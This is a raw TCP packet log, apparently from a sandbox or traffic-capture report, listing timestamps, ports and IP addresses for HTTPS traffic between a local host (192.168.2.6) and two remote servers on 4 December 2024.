                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.492790937 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.492806911 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.492820978 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.493371010 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.493382931 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.493396044 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.493665934 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.511745930 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.511771917 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.532660007 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.540384054 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.701088905 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.761431932 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.776783943 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.780059099 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.781852007 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.783056974 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.787242889 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.808052063 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.883985996 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.884035110 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.884287119 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.884298086 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.884474993 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.884553909 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.887192011 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.887708902 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.894572973 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.894665956 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.894768953 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.895380020 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.895926952 CET54975443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.910427094 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.926333904 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.931062937 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.933026075 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:30.933398008 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.138042927 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.223061085 CET4435497523.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.251946926 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.252019882 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.252065897 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.252074003 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.259412050 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.259581089 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.259844065 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.259927988 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.260027885 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.260040045 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.260354996 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.260365963 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.260376930 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.260389090 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.260915041 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.260926008 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.260941029 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.261051893 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.268476009 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.268543959 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.268831968 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.268842936 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.268853903 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.269599915 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.275067091 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.275079966 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.275208950 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.275219917 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.275226116 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.275674105 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.275686979 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.275697947 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.275707960 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.275774002 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.278220892 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.280740023 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.280750036 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.283066034 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.284110069 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.284121990 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.285200119 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.285212040 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.285223961 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.285231113 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.285269022 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.285280943 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.286569118 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.287281036 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.289669037 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.302424908 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.317374945 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.317394972 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.317409039 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.317645073 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.317656994 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.322853088 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.456867933 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.463833094 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.463956118 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.464037895 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.464051008 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.464365005 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.464531898 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.464546919 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.464560032 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.464793921 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.464803934 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.464814901 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.464828014 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.465084076 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.498229980 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.498249054 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.498261929 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.498469114 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.498481035 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.498495102 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.498516083 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.499044895 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.499058962 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.499069929 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.499550104 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.506094933 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.588608980 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.596812010 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.605593920 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.605612993 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.605962038 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.605983973 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.605997086 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.606492996 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.606508017 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.606525898 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.606540918 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.606878996 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.606892109 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.608165026 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.608339071 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.608468056 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.628887892 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.629138947 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.629158974 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.629173040 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.629184961 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.629198074 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.629214048 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.629409075 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.629724026 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.629738092 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.629761934 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.657747030 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.697047949 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.697091103 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.697134018 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.697310925 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.697345972 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.697402000 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.697438955 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.697945118 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.697981119 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.698016882 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.698051929 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.698086977 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.698122978 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.698637009 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.698775053 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.698832989 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.698868990 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.698903084 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.698937893 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.713327885 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.718163013 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.718429089 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.718575001 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.718682051 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.718718052 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.718939066 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.719091892 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.719150066 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.719186068 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.719222069 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.720145941 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.728784084 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.728980064 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.730700970 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.731077909 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.737581015 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.738105059 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.763190031 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.782586098 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.810755014 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.824826956 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.832829952 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.832845926 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.833095074 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.833108902 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.833206892 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.833218098 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.833219051 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.833538055 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.833549976 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.833561897 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.833575010 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.833587885 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.833758116 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.853105068 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.853136063 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.853147984 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.853269100 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.853280067 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.853310108 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.853323936 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.853889942 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.853902102 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.853914976 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.854072094 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.871694088 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.871707916 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.871720076 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.871994019 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.872009993 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.872021914 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.872035980 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.873270035 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.883797884 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:31.951459885 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.031940937 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.037434101 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.037586927 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.037657976 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.037771940 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.037801027 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.037818909 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.038132906 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.038144112 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.038156986 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.038573027 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.038584948 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.038598061 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.041110992 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.049108028 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.059237957 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.059427023 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.059701920 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.063256979 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.067121983 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.067553043 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.067686081 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.067718029 CET65093443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.067775011 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.067785978 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.068119049 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.068130970 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.068141937 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.068154097 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.068766117 CET4436509323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:32.068778992 CET4436509323.209.72.42192.168.2.6
